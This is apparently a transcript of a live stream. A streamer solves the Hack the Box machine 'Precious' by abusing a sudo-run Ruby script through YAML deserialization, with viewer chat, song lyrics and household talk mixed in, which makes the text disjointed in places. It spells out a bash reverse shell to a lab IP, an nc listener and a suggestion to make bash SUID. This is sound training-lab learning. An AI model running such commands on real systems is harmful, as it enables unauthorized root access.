TTS is supposed to be off. We turn it back on for Gwenum. And turn it back off. Okay, now this was fuzzy to me. So you can run root with no password as this command. No. No. Wait, no, it's something to do with opt. Cat. No. Well, there's a user. Okay. January, the cyber mentee. How you doing today? Okay, let's see IPSEC's explanation of this. Because I kind of understand what's going on. Like Henry can run the following command on Precious as root with no password. But I got a couple things there. I have, looks like 2 directories, Well, actually, one directory reference, and then the other one is a file reference. You doing all right? How about you? Hey, CyberSecurity, I'm good, man. I'm good. Just working through this. We already solved the box. I'm taking more notes on it. I've got your exam next weekend, CyberSecurity. We want to hear about it. Please come back and tell us how you did. And you got this. Both of them are files. Not that one. That's garbage. Everything is in file on Linux, of course. Well, everything has permissions in Linux. Not everything is a file. Ruby's Ruby like Python. It's a binary. And permissions are handled by a file. Thank you. Hey, this thing is running as root with can be run as root with no password. And this file compare installed dependencies with those specified in dependencies.yaml. So is dependencies.yaml what we're looking for? Let's see what IPsec says, actually. Because I already did it.
Actually, I'm going to vim it, so we have syntax highlighting, and of course, vim isn't installed. So let's look at it. We're requiring YAML, then requiring Ruby gems, update the load a file gem specification. Looking at this, it's not really doing anything. I don't know where any type of user input or things like that can happen. It is doing require YAML, so my first thought is maybe if I create like a YAML.rb file or RU, I don't know what the extension of Ruby was. If we went back up here, let's see, where's that find when we're in this directory? I think it's RB, right? Yep, that RB. So if we do lsla, we can touch. We'll do test real quick. Permission denied. So we can't touch files in this directory. We can do a sudo -l, see how we run it. And we can go to dev shm, run this command, and it wants us to have a dependencies.yaml file. So I'm going to copy the opt sample dependencies YAML into dev shm, run it again, and it's telling us what we'd expect, right? So if I cat the opt dependencies, I'm going to try touching, touch YAML.rb, rerun it, and if it errors, it tried to load the YAML Ruby library from my current working directory, which it did not do. So that's not it. The other thing we could do is Google. So Ruby YAML deserialization. And one of the first is a blind remote code execution through YAML deserialization. And essentially, it says when doing a YAML thing in Ruby, you shouldn't just blindly accept user input. And here, let's see, they're doing a sleep for 10 minutes, I believe, right here. So let's grab this YAML file. V dependencies. My shell is dead. That is weird.
Let me pause this guy real quick. I take a quick break. What time is it? Going on 2 hours. Go to the bathroom. We'll reactivate TTS, and I'll be right back.
Pebble Free says,
Not Richie's. Why doesn't it say Theo is live on Infosec streams?
We got a rare connection we don't wanna lose. And I don't care about no one here but you.
Not Richie says,
He must went online in the no allowed category. Web link.
I want you all to myself. Everything I do it for you.
Madam Fabulous says,
Not Richie's. He's in science and technology today for you.
I listed that. This? Yeah. Okay. The board. Yeah. Yeah, I got snacks. Everyone, I got snacks.
Noriki won boba.
translated from Italian.
What category am I in? Science and game development. Is that the problem? Am I supposed to be in science and technology? Okay, so he's working in Dev SHM. Is that called something else? He's working in Dev SHM because you can read write in there, right? But I don't understand why he took out that one line.
evening.
Super Gurmal, good evening. How are you?
Focus says,
Aerial utilization.
Cocus,
And one of the first post is a blind remote code execution.
how are you?
YAML deserialization. And essentially, it says when doing a YAML thing in Ruby, you shouldn't just blindly accept user input.
Makes sense.
Let's see. You're doing a sleep for
Super
10
Cool
minutes, I
says,
believe, right here.
Hard week and next one is not getting better. How are you?
Sorry to hear that. Sorry to hear that. Glad you're on the weekend, though, trying to unwind a little bit.
Focus says,
I'm great. Finally got my home lab set up with Proxmox after like 2 days of troubleshooting this old server log. How are you doing?
My applause button is not working. I fucking...
Madam Fabulous says,
Kolkas Trishidavi.
again, congratulations. What's up? What are you putting on your home lab?
So let's grab this YAML file. V dependencies. My shell is down. That is weird. There's my shell down here. So I'm gonna restart my VPN. There we go. Not sure exactly what happened there. So let's paste in this.
Excuse me. Yeah. Thank you for the on-screen celebration, Tagora. Tagora is a Proxmox fan as well. In fact, he convinced me to convert my my VMware setup over to a Proxmox. I like it.
Coca says,
TBD. I know I'll be putting up some monitoring / telemetry / visualization services, and I've got plans for a Plex media server. Beyond that, I'll need to see how it handles those.
Nice.
Hack the Planet says,
I'm getting paid by Big Proxmox, D.
Okay, so he wiped out
So let's paste in this. What happened there?
the dependencies YAML. Okay, let's go back and look at what I'm working on here. So we know that the command. Wait, are these two separate commands? Opt update dependencies. Will run as root with no password.
One binary call, one parameter, one total command.
Okay, so this whole thing runs as root with no password. And then from reading the code, we see that it reads dependencies.yml. So where is dependencies YML? YAML. I bet it's in
Pebble Free says,
The point is that you make one.
dependencies.yml. There's not one that already exists.
There we go. Not sure exactly what happened there. There we go. Not sure exactly what happened there.
Could only shut my mind out, I would be so happy. Why do I feel so down? Can't stop thinking that I'm just a poor clown, that everybody's fake in my own town, even though I know it ain't true.
Oh, there isn't one. I thought there was one. What did he delete?
So blue, so blue. I wanna get
Hack the Planet says,
You can make your dependencies.yml file in any file path in which you have write access. The path doesn't matter since the actual call to the RB file looks in your local path no matter what.
Directory, which it did not do. So that's not it. The other thing we could do is Google. So Ruby, YAML, deserialization. And one of the first post is a blind remote code execution through YAML deserialization. And essentially, it says when doing a YAML thing in Ruby, you shouldn't just blindly accept user input. And here, let's see, they're doing a sleep for 10 minutes, I believe, right here. So let's grab this YAML file. The dependencies. My shell is dead. That is weird. There's my shell dead here. So I'm going to restart my VPN. There we go. Not sure exactly what happened there. So let's paste in this. I'm going to undo it, set my mode to paste it in, just because it looked a little funny to me, but maybe not. Just get set. I'm just going to run ID real quick. So now I'm going to do my sudo command, and mapping values are not allowed in this context. So that doesn't look like it worked. Here it's doing a request to collaborator. Now it's sending a reverse shell. I'm gonna try maybe a different payload.
I think we used that one.
When I see a reference to it, it's generally documented pretty well. We can see this is a universal gadget for Ruby before 2.7.2. So let's take a look at my Ruby version. We're 2.7.4. So I'm not going to use this one. This is for 2 to 3. And this looks very similar to what I just did. Oh, did some cleanup script delete my dependencies? dependencies.yaml. That is annoying. Is that paste?
Same thing happened to me.
Let's run sudo again. We got another error, but if we go up to the top, we see it running the command. We have the output of ID. So let us go back into dependencies, and I'm just going to put a reverse shell here. So bash-i TCP 10.10.14.8 9001 0 and 1 like this. And let's see, nc lvmp 9001. Rerun sudo, and there we are. We are root at Precious. So I can go to /root, and we can get the flag. So
okay.
do task real quick. Permission value. So we can't touch files in this directory. We can do a sudo -l, see how we run it. And we can go to dev shm. I think it's RB, right? Yeah, pdf.rb. So we do lsla. We can touch.
Wait, what's that?
We'll do.
I gotta go to work.
Oh, okay. Okay. I'll be at work. Oh, you taking a drink?
No, I'm just
Yes,
I'm
yes,
drinking it.
Okay. What time do you work until?
8.
8 o'clock. Okay. We're taking Rosie to a birthday party, and then we're grabbing dinner, and then we are shopping for food for Barb tomorrow. So. All right. All right, be careful. Take your time.
Are you guys getting her too?
What?
Are you guys gonna pick Rosie up?
Yeah.
Okay.
If not, we'll check with you. Okay.
Alright.
All right.
Good.
Yep. Sorry. Gotta check something over here. Reviewing update dependencies RB. We find that, what do we find? I don't see the connection he makes with YAML and Ruby gems, but if it loads dependencies.yaml, that's what I think my connection is. Oh. Hold. I feel like my goal is type. Goal is to type. Our goal is to run update dependencies with a malicious localhouse. See. What are you doing?
You're lucky.
She eat them all?
She was gonna throw them in the trash. She's like, Dad said he wanted any if they were left, but I don't feel like going all the way downstairs.
Oh my god. She just got done running around the soccer field. She couldn't come downstairs?
No, that's what she'd say.
Thank you.
You're welcome.
Hold on.
Madam Fabulous says,
Little bagel pizza bites. I love pizza, man. Living like a king.
Living like a king.
I almost went in the trash. Dumb song.
As you should. Taste is entirely subjective, but that is the correct opinion.
FD85915 says,
Yummy.
Pizza FTW Craigasm.
Yummy.
translated from Estonian.
There's something else here that work that I'm not familiar with.
Pebble Free says,
Are you familiar with serialization/deserialization?
I'm not. Is that it?
Yup.
FD85915
Sounds like a
says,
good tangent.
What the? My HTV box just quit while running Nmap. Not like this.
Oh no, that sucks. Let's ask my buddy. That's a lot. Oh, wait a minute. We did this for the bot, for Twitch hack. Converting Python to JSON and back. Serialization and deserialization explained. Serialization is the process of converting an object or data structure into a format that can be easily stored in a file or database or transmitted over a network. The serialization format is typically a binary or text-based format like JSON or XML.
John says Neovamisfist says,
Your live? Since when did you start streaming again?
Just 2 hours ago.
XD.
Spectre, how you doing?
Alive?
Correct. Same. Deserialization is the reverse process, where the serialized data is transformed back into an object or a data structure that the program can use. How it works: converts an object into a string or binary representation. An object like username, admin, role can be serialized into JSON format as username, admin, role, admin. They look identical. Deserialization converts the serialized data back into an object in memory. Common use is storing application state, objects, saving objects to disk, communicating between systems, sending data via REST APIs, remote procedure calls where objects need to be transformed between systems. Exploiting deserialization vulnerabilities. When deserialization is insecure, it can lead to serious vulnerabilities because malicious input can be crafted to execute unintended operations during deserialization. Key attack vectors: arbitrary code execution. Some program languages or frameworks allow deserialized objects to execute code automatically, especially if the object contains a special method like wake up in PHP or read object in Java.
Scott 1969 says,
Sounds like you are reading about the cert crate in Rust.
Don't know what that means. Scotty, how you doing?
Pebble Free says,
It may help to ask it to put in context of Ruby and YAML.
Thank you for that.
Scott 1969 says,
Good, brother.
Kitty says, No Reiki one bleb.
Bleb. Theo Bleb. What are you doing? Are you two done already? You know, spreading democracy is not a part-time job. Thank you very much, Nori. Theo Bleb.
Madam Fabulous says,
Noriki one blab. Noriki one boop.
Translated from Italian.
YAML, yet another markup language, is a human-readable data deserialization format commonly used for configuration files and data storage. Ruby applications often rely on YAML for handling data. However, insecure use of YAML deserialization in Ruby can lead to serious vulnerabilities, including arbitrary code execution. YAML deserialization in Ruby. In Ruby, YAML data is parsed and loaded using libraries like YAML.load. This process transformed the YAML into Ruby objects. The deserialization process in Ruby is powerful but can be risky if untrusted input is used. Example of safe YAML parsing.
Hack the Planet says,
I think the technical name for the Privisk exploit isn't deserialization. It's just simple path hijacking. Could be wrong.
Okay, that's why the YAML file has Ruby in it. I'm still not 100% on it, but I gotta get through it. On.
But since path hijacking has a specific technical specification, I'd say this is path-based privilege escalation, or insecure relative path handling.
Test real quick. Permission denied. So we can't touch files in this directory. We can do a sudo -l, see how we run it. And we can go to dev shm, run this command, and it wants us
Oh.
Tell me what you want, what you really, really want. I don't even know. These people come and go before you know.
I forgot it was in dependencies.yaml.
to have a dependencies.yaml file. So I'm going to copy the opt sample dependencies YAML into dev.shm, run it again.
Won't somebody help me to get the world to somehow slow down? I don't know where to go now. When I was a kid, I couldn't wait to grow up. Now I wanna grow down, but I don't know how. All I have is this voice in my head screaming so loud. Where do I belong? Where do I belong? The voice in my head says, tell me what you want, what you really, really want. I don't even know. These people come and go before you know they're all gone. Even when no hope, I know the show has to go on. But where the fuck do I go?
Okay, so I can run that file from anywhere, but I can't run a dependencies out of opt, dependencies.yaml out of opt. That's why I need to move it over to dev.shm.
And it's full dependencies YAML into dev.shm, be the opt sample dependencies.
Oh, sample has a dependencies.yml in it. So no. Right.
Stars align for you and I. Maybe we should both try. You don't have to be afraid. Everything will be alright. Would you let me hold your hand and fly? Would you hold your hand and fly? Would you let me hold your hand and fly? You are everything in my heart and in my mind. I believe in fairy tales and happy endings. Natural phenomenon, unexplainable feeling. I was lost, but I found you. Would you let me hold your hand and fly? You don't have to be afraid, everything will be alright. Would you let me hold your hand and fly? Would you let me hold your hand and fly? Would you let me hold your hand and fly?
Fighting it hard. Fighting it hard.
And fly. Funky, y'all.
You can do a tiny little motor. There's any cats in the hallway, you better get to stepping. Okay, I think that'll do. You gotta turn your little head up here a little more. How's that sound? Uh-oh. I froze myself. And the mouse, every time.
FD85915 says,
Theo has finally lost it, lol kappa.
I'm too high. All right. Fighting it. So I'm fighting back. Okay. Okay, so I moved dependencies YAML file to dev.shm. How come I don't think that was right? No, that's right. So if I run... Oh. No such file or directory at rbsys open.
YAML into dev.shm, run it again, and it's telling us
Kitty
what
says,
we'd expect, right?
Noiki one pinky.
Oh, I tell you why, because I'm not in that directory. That's why. No. Oh, that's right. It wiped it out of there again. Okay, let's copy it again. Sorry. Yeah, there's some kind of auto cleaner.
Ralto Moon says,
Hello.
OPT sample? Carver County Tech Support. Hello, how you doing?
What are you doing right now?
No clue. No clue. I'm kidding. We're doing Precious on Hack the Box. How you doing, Raul?
Pebble Free says,
Cleanup scripts are my pet peeve when
You
it
almost
comes
have to do like a
HTTP.
quick check to make sure that it's actually there. Carver, you over on YouTube. How you doing today? The voices that you hear are over on Twitch for the text-to-speech.
SSML error.
Good. How are you?
Good, Carver. Good, good. What do you got going on today? Do you actually do tech support? So it's opt sample. Yeah. Yeah. Okay. Okay. Now now we run.
I do. I just relocated from Seattle to a small town in Minnesota. I am in the process of opening my business here.
Spectacular. Good luck. Great to hear. Really. Really. Now, did you do that in Seattle? So you just got to apply the same recipe over there in Minnesota? Okay, now I need the script from...
Thanks.
You're very welcome. Oh, it cleaned it up again. So you gotta do this pretty damn fast.
Yes. Most of what I do is hardware repair. But I provided a lot of on-site IT support to individuals as well as small businesses.
Oh shit, that's right. It doesn't have Vim. It got wiped out again.
Pebble Free says,
It may not get cleaned if you do it in your home, dear.
Dan Corona on YouTube says,
Use Vi.
Yeah, I can. Dankeroner. How are you doing there on YouTube? Great name. I started looking at, oh, I'm sorry, hold on. Yes, most of what I do is hardware repair. Cool, because you need that now. Provide a lot of on-site IT support. Very cool. Very cool. Yeah, kick its ass, Carver.
SSML error.
I started looking at penetration testing this week. I think that's why the Algo delivered you to me today.
Oh, yeah, that makes sense. Where did I go to? Nano?
Dan Corona on YouTube says,
Haha, what's ups?
Good name. Good name, Dan Corona. Yeah. Good to see y'all hanging out over there on YouTube. YouTube's been a nut to crack. I've actually been like co-streaming YouTube and Twitch simultaneously now, like over 6 months, and people just started showing up, which is cool.
Nothing in this world that's worth having comes easy.
Nothing. Thank you, Dr. Kelso.
Thank you, man.
Madam Fabulous says,
Do you publish videos / shorts too? SSML era.
Yeah, I do. Yep.
I can't stick around right now.
It's okay.
I am in the middle of some other work.
No problem.
I have subscribed and will come back and watch this vid later.
Later, or I stream about 4 times a week, so even if you come and catch the next ones, that's fine. Thank you very much for hanging out, and thank you for the subscribe over there on YouTube.
Madam Fabulous says,
Doing clap the clap thing.
FD85915 says,
Don't mind me while I enjoy my coffee and tiramisu cafe.
Oh, I want tiramisu. One more. Can we get the Hal? Oh no, no. Oh no.
SSML era.
Nice to meet you.
Nice to meet you.
John says Neovimisbus says,
What's the cat one?
Shit. I just copied over it. Hal. Oh, the cat one? Shit. Hallway cats.
Nope, it's not shit.
Found? It's hallway cats.
If there's any cats in the hallway, you better get to stepping.
Oh my god.
SSML era.
I'm back.
Good. All right. I thought shit was one. It's the Spaceballs guys combing the desert.
I'm sorry, Dave.
Pebble
I'm
Free
afraid I
says,
can't do that.
What's the context behind that audio XD?
Which one? Hallway cats? My dog, Cav, the pit bull mix. The pit bull mix. Pit bull that we got from the rescue, from the pound, is afraid of the
SSML
cat.
era.
Hey man, I just noticed that your live videos on your YouTube page are not being listed in your regular video list.
Yeah, they're not.
Stream Element says,
John says Neovimiscus tilde/home/root.
So the hallway cats is because what he does is he whimpers at me until I escort him upstairs, because the cat hides in the furnace room and he's walked by before and it's like the cat's attacked him. So he whimpers at me until I take him upstairs, until I escort him upstairs. And the one day I was irritated because I was working on something and I said that. Wiped out. Yep. So I got to get in there. I got to make it. I got to do the whole thing again. And I copied it over. I went and used another command, and I copied it over, and I wiped out what I wrote. Don't tell. It's just don't tell, Jess. Don't tell. Pierre's listening to King Nothing from Metallica. Good song. Don't tell Jess.
John says Neovimisbus says,
Damn it all.
Yeah, Carver. I don't know. I don't do YouTube. I don't do YouTube. It's a problem. I do the shorts over there, but yeah, I don't know if I'm supposed to. Is that a manual process? I got to move them over to the regular video list. That sounds terrible. It should do that automatically.
He's a pro streamer.
You forgot to
Not
put it
a
in
pro
quotes.
YouTuber XD.
You forgot to put it in quotes. All right, again. Copy it over. And now VI dependencies.
You get
And,
paid. It's not in quotes.
Delete. Escape. Insert. Okay. Escape. Right, quit. It's in there. Run it. Before it disappears. Sudo. Okay. Oh, that's right. The ID. There it is. And now we're going to put our reverse shell in there. Shit, I should have had the reverse shell cooked up. Yeah, I can use... It's on the...
All's Journey says,
Sup man.
Al, how you doing? Copy.
Pebble Free says,
Control plus R to search command history.
Yeah.
Could type sudo and it would pop up.
All's Journey says,
Heck yeah.
Pebble Free
Thank
says,
you. Thank you, Pebble.
Quick tip if you didn't know.
Yeah, could reverse search. Yep. Okay. Copy it over. Dump in the reverse shell code. Put my bash reverse shell in it in place of ID. Pop back out and run it.
Dan Corona on YouTube says,
RivShell Generator. It's great website.
All right. Copy it. Copy.
John
You know what?
says
I don't
the
think it's
Evanist
special.
says,
I mean, I should just be able to create it. Copy it. Here's the reverse shell.
Supposed to memorize anything and everything.
Right on. Shoulda, coulda, woulda. Cheating. Cheating? I'm a hacker. I don't know any better. Yeah, I like rev shell generator.
585915
Yep.
says,
Lol.
All right. Where are you at? Here. Okay, let's grab this guy now.
John says
Boom.
Neovermispus
Insert.
You're not a
V.
hacker. You were a Googler.
A
noogler at that.
Crap. Can I go up? Wait, escape. J. K. Insert. Shit. Ah! My V is rusty.
Shoujo Boy says,
It's too late. It's too late. It's
the
gone.
Cleveland Browns flag is minus 1,000 hacker aura.
Madam Fabulous
Shoujo
says,
boy.
Nashe Manano.
Translated from Spanish, Arony Dude says,
What are you trying to do with them?
No clue. I'm trying to do Vi. It doesn't have Vim installed.
John says Neovermispus says,
Maybe Nano. Maybe, is it Nano? It does have Nano. Okay. Let's go down to here. Nope. There. Delete.
Madam Fabulous
Drop
says,
in my reverse shell.
Nano is the goat.
The Cleveland Browns suck. I can say that because I'm a fan. No one else is allowed to talk shit on them.
Dan Corona on YouTube says,
You to undo once in insert mode you can use arrow keys.
John says Neovermispus says,
Sudo apt install neovim.
translated from Croatian.
X. Yes. Enter. Run it.
Gun Void Walker says.
Is it time to invent Neo Nano?
Army Dude says.
Must be old if Vim isn't on it.
Arian, thank you. To unsave and quit. And well, the problem is there's an auto cleaner. I only have so long to like drop it in there and go. I don't want to put it in my home. Why am I operating in why am I operating
Pebble Free
in
says.
DevShim?
Theo, you need a listener goober.
Oh yeah, that's right. I need a listener too. Back to my Browns flag. Let's focus on what's important here before we get too far away from it. Shoujo boy. What do you got against the Browns? What'd they ever do to you besides suck?
I just liked mod u plus s/bin/bash. Makes bash soid. Local privisk, no need for extra shells.
Shoujo Boy says.
Poof. Absolutely not. It is not hacker. It is quintessential. Underrated. The eternal underdog. Which I truly believe hackers are. Thank you for coming to my TED Talk. To my Theo Talk. I'm just joking. Shoujo boy, I'm just joking. They're terrible. They're awful. Just awful.
All's Jenny says.
Okay.
D.
Okay. Okie dokie. Is there any other... I mean, can I just put this effing thing in temp? CD, TMP. Huh? And it won't get cleaned up.
John says Neovamisbist says.
Did you just say Tempe?
Pebble Free says.
Oh dear.
Shoujo Boy says.
Lol, I joke. I'm a Chargers fan, so I know a thing or two about suckiness.
Well, you kicked our ass that
says.
week.
John says Neovamisbist caught.
And Myles Garrett had 3 or 4 sacks, and we still lost. I was at that game. Home directory. Why was I putting it in my other one? Absolutely not. Stop recording. Quit. Stop it. Nope.
Pebble Free says.
I'm actually curious if just /bin/bash would work and put you in a root shell.
We can try that. Yeah, it should. Yeah, it's just ID. We're just looking for another shell.
Supergirl says.
Some say the Browns use
Oof.
Neo.
Absolutely not. Supergirl. I absolutely, that is completely not allowed to link my beloved Cleveland Browns to the text editor that shall not be named. Absolutely not.
Dan Corona on YouTube says.
Yeah, it is.
Great advice. Local Priviscape is a
Okay.
great idea.
So, what did I do? Stopped? Okay. Okay, so you think I can pull this off in my home directory? Yeah, I can. Because your face, that's why. I should be able to write to my home directory as Henry. Okay, we got this. It's under control now. We have this under control. Here's my script. Right? Not WQ. Control X. What? Yes.
FD85915
Yes.
says,
So Henley is the real hacker.
Henley? Who's
Kappa.
Henley? Hmm?
John says Neovemisfist says,
Web link.
What is that? Let me run this first.
I know you said TMP, but it sounded like Tempe lol.
Reading not found. Do I have to... did I not change read, write, execute? Correct.
Irony Dude says,
You gotta learn Viets in Chapter 0 of OSCP.
Pebble Free says,
Root buddy.
Oh yeah, shit. It did work. Yeah. IPSec completely missed that. He ran a reverse shell from in there. You didn't need a reverse shell. It was taking commands.
Dan Corona on YouTube says,
Good sign.
Yeah.
Madam Fabulous says,
Pebble root.
Yeah, cool. Good idea, Pebble. Thank you. Hey, if you are not following Pebble already, also, you should definitely click the little heart button up here. Right up there.
Dan Corona on YouTube
Who's
says,
focused on
Tribin/SH.
certificate
Pebble-free
collecting
says,
and OSCP
Less
passing
than
as well.
3.
Tribin SH.
Theo says,
Vin/S.
You idiot. I spelled it wrong too. I don't know. What are you trying to get me to type? What are you trying to get me to do?
Disha2K24 says,
Pebble 3, when is the stream?
Get the F out of that thing. And then there's the other
Pebble
one.
Free says,
Disha 2K24 TMR 12 PM EST.
Yep. Dishka 2024. Thank you for popping in the first time chat to ask another streamer what time they're going to stream today. it's very humbling. Thank you. If it were anyone else, I'd still take
Question mark dollar hash at dollar.
translated from Haitian Creole. Dan Corona on YouTube says,
Amazing man. Good job.
Thanks,
Madam
Stinker.
Fabulous says,
All right, notes now. Notes. I don't know if that's completely right or not, but I feel like this is correct though. I mean, like reviewing dependencies RB, we find it runs that it loads a file called dependencies.yaml when actually I'm going to put the full path in here. Don't tell Jess. Don't tell Jess. Don't tell Jess. Don't tell her what.
Nothing in this world that's worth having comes easy.
Irony
Period.
Dude says,
Obsidian is life.
Period. Dude, the dude is not wrong. The dude is not wrong. Anything
John
worth
says
having
Neovenisfist
takes time.
says,
You Obsidian.
Oh, Obsidian's hot. Right? Dude, look at it. Dude, look at it in reading mode. Oh. Dude, that's so hot. Look at that.
Log seek greater than Obsidian.
Oof.
Translated from Swedish.
Get the fucking
XD.
log seek. You make it up.
Translated from Spanish.
You make it up. Dude, look at that. Dude, that is so pretty. That's so pretty. And then guess what happens?
Arony Dude says,
It goes
You
online.
need to download Tokyo Night Theme Best One emo.
And then
John
it goes
says
to my,
Nova
then it
Mistress
goes here.
says,
I think we need all the workouts from Theo.
Madam Fabulous says,
Have you ever considered you're just excitable? They have pills for that smile.
Dan Corona on YouTube says,
I use cherry tree like a peasant.
And then look how pretty it looks on the notes page. Look how pretty it is. Oh, code blocks, headings. Dude. That's hot, right? Come on. Is my embed still working? I didn't check. Yeah, there we are. Right? Get a little embed action.
85915 says,
Cherry tree FTW
No,
Kappa.
I used Cherry Tree at one time. I was in. Oh my god, I was taking notes in Evernote at first, and then
John
Microsoft
says,
Notes,
says,
MS Note. Yeah.
I expect this level of excitement from a Browns fan.
Arony Dude says,
Oh shit, what plugin was that?
Jojo Boy says,
Markdown.
Export sexy equals Obsidian.
Pebble Free says,
Material
Cherry Tree
for
is dookie.
MK Docs.
I'm sorry.
No, whatever. No, but yeah, no, whatever. So, we can hate on NeoVim all day long, but for whatever text editor you use or whatever, I don't want to look at myself. Whatever text editor you use, like whatever works for you, use it. If it's pen and paper, if it's Cherry Tree, if it's whatever, then use it. But yeah, all my notes get backed up to my GitHub, and then my GitHub or MK Docs will pull it out and publish it in this nice format too. Just my notebook.
Arony Dude says,
Docs. I haven't used with Obsidian, just GitLab.
And if GitLab enables you to publish, just keep using that. And I don't know if they're still here or not, but that's what I was talking about with like show what you're working on. Like you got to show what you're working on, and you have to do relationship building, not just like LinkedIn. You got to do IRL. You got to grip and grin. You got to face-to-face stuff.
FD85915 says,
Oh wait, Obsidian is free for personal use.
It is.
Speechless face.
If
I thought it was a subscription.
If you want to use their sync, that's a subscription. But like you don't have to, especially if you do the GitHub thing. Even if you do the backup to GitHub, you don't have to. It's just there. You can just go on GitHub and find your notes. And I think there's something for like Google Docs.
Arony Dude says,
But I don't know how to do that.
You can create a private repo on GitHub and just back up that
Yeah.
way. Yep,
Yeah.
that's the cheapest way.
Yeah, agree.
Dan Corona on YouTube says,
I'm about to drop a write-up on Cicada, and am going to be spamming HTB with retired machine write-ups.
Love it. Love to hear it. Love to hear it. Okay. Notes.
Madam Fabulous says,
OneDrive works alright too.
Our goal is to run this guy run Let's put this in a code. Oh, I forgot. I gotta go back to it. Yep. Run. Nope, wrong character. Dum dum. Sudo bin ruby opt update with a malicious dependencies YAML. This is what's hard, is this connection that I didn't make but works. I don't have any other way to describe it than this. Where am I?
Pebble Free says,
It's kinda insecure relative path handling plus insecurity serialization equals utilize an arbitrary Ruby serialized YAML file for code execution.
Oh, the box is locked. Damn it, Callie.
Locked.
It's froze. Callie froze. Execute what?
Madam Fabulous says,
Are you using VNC?
No, I'm using Spice. VNC doesn't have a good copy paste.
Gotcha.
Shoujo Boy says,
Just give her user account Kansas City Chief access. Greater than Henry all equals
Oof.
ALL.
Absolutely not. I hate the Kansas City Chiefs. I almost hate them worse than I hate any of them. The text editor that shall not be named. I just don't like them. I think they're gigantic diaper babies. Are you a Chiefs fan, Shoujo Boy? I'll stop talking shit about them, but I don't like them at all. Execute what? Execute get set.
Never. I use Neovine before I root for them lol.
Wow, you must really hate him.
Dan Corona on YouTube says,
There clearly will not be any browse slander on this channel. Lazy Vim rocks though lol.
I mean, I'll take a little bit because they do suck. They do suck. We were good. We were good. We were good. Guess the last time I saw them good was with Baker Mayfield. What a shame. How's he looking over there with the Bucks? Get set. Flag. Get set.
Scott 1969 says,
Baker Mayfield, I thought he retired.
Nope.
Shoujo Boy says,
Baker looking decent.
Yep.
He held Bosa with one hand and converted on 4th and 5th lol.
Yep. He played injured the year after COVID. He played injured. And instead of keeping him and investing in him, we dumped $230 million on a quarterback that hasn't played a full season since we got him.
Not as bad as the NY Giants and Daniel Jones.
Scott 1969 says,
That's okay. The last time the Bengals were good was with Jay Cutler.
Dan Corona on YouTube says,
Where can I find your notes? Are they published publicly?
Try for me if you could, Dink owner, exclamation point notes. I want to see if Restream will post it in YouTube. I want to see if Restream will post it. Wait a minute. No, that won't work. Correct.
John says Neovinismus says,
Doubt it, but that would be cool.
Shoujo Boy, thank you for the follow.
Thank you for
Hey,
following.
thanks for having a
Shoujo
sense of
Boy,
humor, too.
smile, smile.
See if it pulls it over from YouTube from Restream. No. Okay.
Dan Corona on YouTube says,
Copy that.
And it went Stream Elements and it stayed in Twitch. All right, so a little clunky, but at least I'm getting the messages now. And there they
Theo
are.
says,
Web link.
Yep. Let a brother know if you find a password or something sensitive in there, please. I think I cleaned it out pretty good, but let a brother know. So create
Stream Element says,
a
John says Neovimismus /home/root.
Scott 1969 says,
You get those spots on your arms too, Theo.
you know what? I am still, my arms haven't been the same since taking down and cutting up that half a tree. Like I cut myself up so bad. There's a little bit of scarring, but then there's bumps from where I nicked myself with the tree.
Mine's from getting old.
Yeah. Well, yeah. Yep. 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 It's locked up. I have to reset it.
Dan Corona on YouTube says,
Thanks. Your notes are looking clean.
You're being kind. Thank you, though. There's stuff that I'm working on. There's stuff that I started and I never completed. There's a lot of it's a evolving thing. It's whatever I'm working on. So thank you. Should be root. Should be root. Where's my Proxmox? Over here. Can I do anything? Is there anything that you'll let me do? No, you won't. You suck. As soon as I copied that website, it crashed. Close it. Okay. Shut down. Does anyone want to redeem a reboot? Now would be a good time to redeem it.
Madam Fabulous says,
You could try shinging and restarting Spice.
That sounds like fun. Where can I find? Oh, I know what it is. Wait. No, I don't. Well, that was the VPN. Do I have its IP written down? I don't think Spice is the problem. Like even here, even at the console, it's frozen. I mean, I could try to SSH into it.
Console top right?
Yeah, that's let me see if no VNC does.
Madam Fabulous
No, it's frozen.
Do you have WSL? I just do a ping sweep from that when I'm in this situation.
Oh, yeah.
Other option is to look at your DHCP reservations.
Wait, where am I? Yeah, this is on my server. No, that is, that's my box. What's the command for shit on the network? I can nmap. I don't want to nmap.
Is SSH even running though? Nmap
I
works
think,
lol.
yeah, I can nmap it. But I need the IP of my Proxmox.
Madam Fabulous says.
Nmap SN.
Translated
SN.
from
That's
Welsh.
what it is.
Pebble Free says.
Sweep the network.
Sweep the leg, Johnny. You need the IP dum-dum of the Proxmox. No notes. Professional.
Madam Fabulous says.
192.168.1.024 probably.
I'll give that a try. I don't think it is, though. Oh, no, that's everything. It may be back. Actually, maybe. I think it's backwards. What's that?
Grep Kali, so you don't show us all your home network maybe.
Too late.
Oh.
What the fuck? Hold on.
And I can't fight off your embrace. I have no self-control. Your love won't let me go. Oh no, no. It's like I got raided and the offender took off without any traces. But through the front door of my imagination, ran off with everything. It don't take no time wasted. Debating, safe to say it's you. I don't know what you done and I don't know what my brain did, but everything inside of it evaporated. You see, before I had a lot of thoughts racing, but you erased it and replaced it too. You've taken up all my headspace, and I can't fight off your embrace. No, I have no self-control. Your love won't let me go. Oh no, no. I got a short attention span, of which I'm sure I never had. Oh, my mind keeps on running, I'm running away. Ever since you came, you've taken up all my headspace, and I can't fight off your embrace. Oh, I have no self.
Great news. I found snacks. Would anyone like Sun Chips?
Pebble Free says.
www.
Translated from German.
Sun chips are goated.
Yeah. Yeah, the Ring doorbell went off. I saw my daughter walk to the end of the driveway, and I went to go live, and I didn't see her, so I freaked out.
Hack the Planet says.
Like made from goats?
Oh wait, that's not gonna work. Good song.
What seems to be the matter?
My Kali box locked up. I have like 2 more notes I got to get off it. I'm trying to see if I can revive it before I reset it. So I'm looking for I'm looking for the IP address. I can't remember what the IP address is of it. Wait. I don't see it there. So,
Did you ever load Kim a guest agent on it?
don't know.
If you did, the IP will be listed under summary.
It is. I'm disappointed, chat. I was on the screen 3 times. No one could have pointed that out. As I'm looking to cast blame. 32. Okay, so what am I going to try to do? I'm going to try to SSH into this.
FD85915 says,
Hack your Kali box to get your notes back, Kappa.
Hack the Planet says,
ping it first.
Ping your face. 36. 32. 32. It's alive!
John says Neovermispist says,
New.
translated from Tagalog.
Correct.
Hack the Planet says,
Then you can also port test.
What do you mean port
John
test?
says Neovermispist says,
You'll be.
Pebble Free says,
Test port 22.
Hack the Planet says,
In PowerShell, TNC 192.168.0.32 port 5900. Assuming you're running VNC.
Spice. Ooh, that looks good. TNC or VNC? Got it.
